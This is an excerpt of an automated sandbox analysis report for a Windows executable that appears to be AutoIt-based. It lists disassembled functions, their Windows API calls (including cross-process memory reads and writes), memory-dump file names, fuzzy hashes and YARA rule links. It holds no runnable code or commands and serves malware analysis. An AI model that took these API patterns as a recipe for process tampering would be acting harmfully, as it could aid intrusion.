                                                        • Opcode ID: 1f2bd7f1d55d7072462acd23cbc107bb6631217195af9ee22991227b0ec6823e
                                                        • Instruction ID: 3925bf5b7e301b5ec4e9ea6d11830797ce3f0c3218cda5079947f7a08fbbeb15
                                                        • Opcode Fuzzy Hash: 1f2bd7f1d55d7072462acd23cbc107bb6631217195af9ee22991227b0ec6823e
                                                        • Instruction Fuzzy Hash: 31F06875240304BFE7110FA5DCC8EA73BADFF86758B104039F549C7260CBA19D82DA60
                                                        Function 0011C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0011C1F7
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0011C20E
                                                        • MessageBeep.USER32(00000000), ref: 0011C226
                                                        • KillTimer.USER32(?,0000040A), ref: 0011C242
                                                        • EndDialog.USER32(?,00000001), ref: 0011C25C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 2d8b4113e64ab70fa801e585b2e4e0c6253c3833645e157c24711aade840b01e
                                                        • Instruction ID: c8d22218455c223fa1cd18d99fa8092d8983350ca5dbd07624cf6e34628e32f1
                                                        • Opcode Fuzzy Hash: 2d8b4113e64ab70fa801e585b2e4e0c6253c3833645e157c24711aade840b01e
                                                        • Instruction Fuzzy Hash: DB01A234444304ABEB285B64ED4EFD677B8BB01B06F00026DA546A19F1DBF469C5CB90
                                                        Function 000C13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 000C13BF
                                                        • StrokeAndFillPath.GDI32(?,?,000FB888,00000000,?), ref: 000C13DB
                                                        • SelectObject.GDI32(?,00000000), ref: 000C13EE
                                                        • DeleteObject.GDI32 ref: 000C1401
                                                        • StrokePath.GDI32(?), ref: 000C141C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: 97ce798e7cf0021b8aa7b186bcc4645e6a86e964e4bd19214e2775beb691b4b8
                                                        • Instruction ID: 9905c33872820ef0e685418095ccfa6f513fc902616d9359f9498aead60c7871
                                                        • Opcode Fuzzy Hash: 97ce798e7cf0021b8aa7b186bcc4645e6a86e964e4bd19214e2775beb691b4b8
                                                        • Instruction Fuzzy Hash: FBF0A834004648ABDB255F56EC4CB9C3BE6EB43326F188229F429499B2C73146D6DF60
                                                        Function 000D2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000E0DB6: std::exception::exception.LIBCMT ref: 000E0DEC
                                                          • Part of subcall function 000E0DB6: __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 000C7A51: _memmove.LIBCMT ref: 000C7AAB
                                                        • __swprintf.LIBCMT ref: 000D2ECD
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000D2D66
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: cf6c6b197ba0b9131559e79c8d48d25f4f571e1a29861af0883044fba42afcb0
                                                        • Instruction ID: b51a5bf82a06a2799b4c12a746c2dc2ac28dcf7f7b1af6690441ed5b6360d57d
                                                        • Opcode Fuzzy Hash: cf6c6b197ba0b9131559e79c8d48d25f4f571e1a29861af0883044fba42afcb0
                                                        • Instruction Fuzzy Hash: 57913B712087019FC714EF24C895DAEB7E8EF95710F00492EF8959B2A2EB70ED44CB62
                                                        Function 0012B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                        • CoInitialize.OLE32(00000000), ref: 0012B9BB
                                                        • CoCreateInstance.OLE32(00152D6C,00000000,00000001,00152BDC,?), ref: 0012B9D4
                                                        • CoUninitialize.OLE32 ref: 0012B9F1
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: 57aa55e94e7550847ad9f934b5a757833bfb4cc6b9daeaf39876b745574e8864
                                                        • Instruction ID: c4160dd2daee6e58a50392491201c9d7fcced4e51aed21b4da46523f635d0b94
                                                        • Opcode Fuzzy Hash: 57aa55e94e7550847ad9f934b5a757833bfb4cc6b9daeaf39876b745574e8864
                                                        • Instruction Fuzzy Hash: 92A133756042159FCB00DF14C884E6ABBE5FF89714F14899CF8999B3A2CB31EC46CB91
                                                        Function 000E501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 000E50AD
                                                          • Part of subcall function 000F00F0: __87except.LIBCMT ref: 000F012B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: 8a83220aa34d7270a6a65df2344ad1440c2a02822c5d804af9dfd3703edd886b
                                                        • Instruction ID: b769671b61adb3f1ef2ce441273abea02ed1e080ca0a6a8ec44fdaef5cc14181
                                                        • Opcode Fuzzy Hash: 8a83220aa34d7270a6a65df2344ad1440c2a02822c5d804af9dfd3703edd886b
                                                        • Instruction Fuzzy Hash: 2651B12090C646CADBA17715CC0237E3BD0EB40716F208D99F5D5966DBDF348DC4A782
                                                        Function 00108584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: 3c$_
                                                        • API String ID: 4104443479-867841958
                                                        • Opcode ID: 862a8f1a4f9435284d95b75fcc830d6e7e25275ade8b16271af712a9e9bbd4e4
                                                        • Instruction ID: d9f58344069c9b701e038c986697b91834165b08e5fc9ec16cb2a6b5b2f1b0cb
                                                        • Opcode Fuzzy Hash: 862a8f1a4f9435284d95b75fcc830d6e7e25275ade8b16271af712a9e9bbd4e4
                                                        • Instruction Fuzzy Hash: 5B514F70E00619DFCB24CF68C884AAEBBF1FF45314F14852AE89AD7390EB71A955CB51
                                                        Function 001197F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 001214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00119296,?,?,00000034,00000800,?,00000034), ref: 001214E6
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0011983F
                                                          • Part of subcall function 00121487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 001214B1
                                                          • Part of subcall function 001213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00121409
                                                          • Part of subcall function 001213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0011925A,00000034,?,?,00001004,00000000,00000000), ref: 00121419
                                                          • Part of subcall function 001213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0011925A,00000034,?,?,00001004,00000000,00000000), ref: 0012142F
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001198AC
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001198F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: 99c212e9a6b064ad1b669d0189dad08b551670c9f7e943c7aadfc23cb50ca494
                                                        • Instruction ID: 782b348718ff18b146214c5019120b49b532b8733c540876cf587d06dc01ae49
                                                        • Opcode Fuzzy Hash: 99c212e9a6b064ad1b669d0189dad08b551670c9f7e943c7aadfc23cb50ca494
                                                        • Instruction Fuzzy Hash: 0A414F7690121CBECB14DFA4CC51ADEBBB8EB15300F0040A9F959B7151DB716E85CBA0
                                                        Function 00147946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0014F910,00000000,?,?,?,?), ref: 001479DF
                                                        • GetWindowLongW.USER32 ref: 001479FC
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00147A0C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 2b63cf0ef9b4753eb7d27acf752ae4b7c2ed9b7a3428efaa82908afef16fe0b8
                                                        • Instruction ID: 3a4e046d263d86218545cc92d46c28a83aed61292528a56b8c77e1711c4e084a
                                                        • Opcode Fuzzy Hash: 2b63cf0ef9b4753eb7d27acf752ae4b7c2ed9b7a3428efaa82908afef16fe0b8
                                                        • Instruction Fuzzy Hash: 2D31BE31204206ABDB118F38DC45BEA77A9EB49338F248729F975A32F1D731E9518B50
                                                        Function 001473D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00147461
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00147475
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00147499
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: eae618e156cf208619181b29ffe89bdd24fe312cec8ec0d49356a3149af4a029
                                                        • Instruction ID: 9837e052397bd50b0ba404c9a833138de650ea8e51b2a870d0a38a966261b1f1
                                                        • Opcode Fuzzy Hash: eae618e156cf208619181b29ffe89bdd24fe312cec8ec0d49356a3149af4a029
                                                        • Instruction Fuzzy Hash: 0B219F32500218ABDF118F64CC46FEA3B7AEB48724F150214FE156B1E0DB75AC91DBA0
                                                        Function 00147B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00147C4A
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00147C58
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00147C5F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: 72643b0a44544d2dc63584be1b48d14057cfa205ef3300582d488ac19c66e2b8
                                                        • Instruction ID: 7358984800d3d6515e57f0a7c2fb9e89f028c34e203c1f569b5582c9e7c34281
                                                        • Opcode Fuzzy Hash: 72643b0a44544d2dc63584be1b48d14057cfa205ef3300582d488ac19c66e2b8
                                                        • Instruction Fuzzy Hash: DD215CB5604209AFDB10DF28DCC1DAA37EDEF5A394B150059FA159B3A1CB31ED518BA0
                                                        Function 00146CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00146D3B
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00146D4B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00146D70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: d626f505d37005e5821a9255507f2d08be24bb6b89aa08dd5f5803be0350c118
                                                        • Instruction ID: 8c1ecf986247f5ec3b5b4cb2e13e22b7998f2281c0d1b3321fb2faff0aa08d69
                                                        • Opcode Fuzzy Hash: d626f505d37005e5821a9255507f2d08be24bb6b89aa08dd5f5803be0350c118
                                                        • Instruction Fuzzy Hash: 3521B032600118BFDF118F54CC85EAB3BBAEB8A764F018128F9459B1A0C7719C5187A1
                                                        Function 0014770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00147772
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00147787
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00147794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: 2e1e01dbdc1d5d600179a4b65b4d1dc5c85df02bfca464b46070fc9b0de61f20
                                                        • Instruction ID: f2ac4e491df2b80f019a3ec91b31d4725bc39b28f40493bba22be02436a0b775
                                                        • Opcode Fuzzy Hash: 2e1e01dbdc1d5d600179a4b65b4d1dc5c85df02bfca464b46070fc9b0de61f20
                                                        • Instruction Fuzzy Hash: C4112772244208BAEF105FA0CC45FEB7769EF89B54F014118F645960E1C771E851CB10
                                                        Function 000C4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4BD0,?,000C4DEF,?,001852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000C4C11
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4C23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: a6cd9d4e966d3271bc8baa40b3f8481a799a7db64111a8ed4b1dd2fb0239403d
                                                        • Instruction ID: de354a1d9ca89a16db2853e6756dc8909f70172518c06b824ae4ede00cb8b649
                                                        • Opcode Fuzzy Hash: a6cd9d4e966d3271bc8baa40b3f8481a799a7db64111a8ed4b1dd2fb0239403d
                                                        • Instruction Fuzzy Hash: 72D0E274911712CFD760AF71D958A0ABAE6EF0A792B11883EA486D6670E7B0D881CA50
                                                        Function 000C4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4B83,?), ref: 000C4C44
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4C56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: f2399a9269298ba12452f1caaf6c12dd782a7a4c3253c911afbe4b0e9e960764
                                                        • Instruction ID: 8400ca1e0e89c9da7eb2dd0516ba643f8988aca1468703b1e36467cf5378240b
                                                        • Opcode Fuzzy Hash: f2399a9269298ba12452f1caaf6c12dd782a7a4c3253c911afbe4b0e9e960764
                                                        • Instruction Fuzzy Hash: 14D01774A10713CFD7609F31D958B0A76E5AF06791B11C83E9496D6670E7B0E8C0CA50
                                                        Function 00140DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00141039), ref: 00140DF5
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00140E07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 20b5e6e539641094c25e9b4060c1208f9601d9b6a3b3254d8d641e4879678310
                                                        • Instruction ID: cf0159ae7f71a68002d5ed2e767d713744c1c0f9fe8f3b380009643a73d9a334
                                                        • Opcode Fuzzy Hash: 20b5e6e539641094c25e9b4060c1208f9601d9b6a3b3254d8d641e4879678310
                                                        • Instruction Fuzzy Hash: 01D01774910732CFD7219F76C80868676E5AF09752F11CC3E958AE6660E7B4D8E4CA50
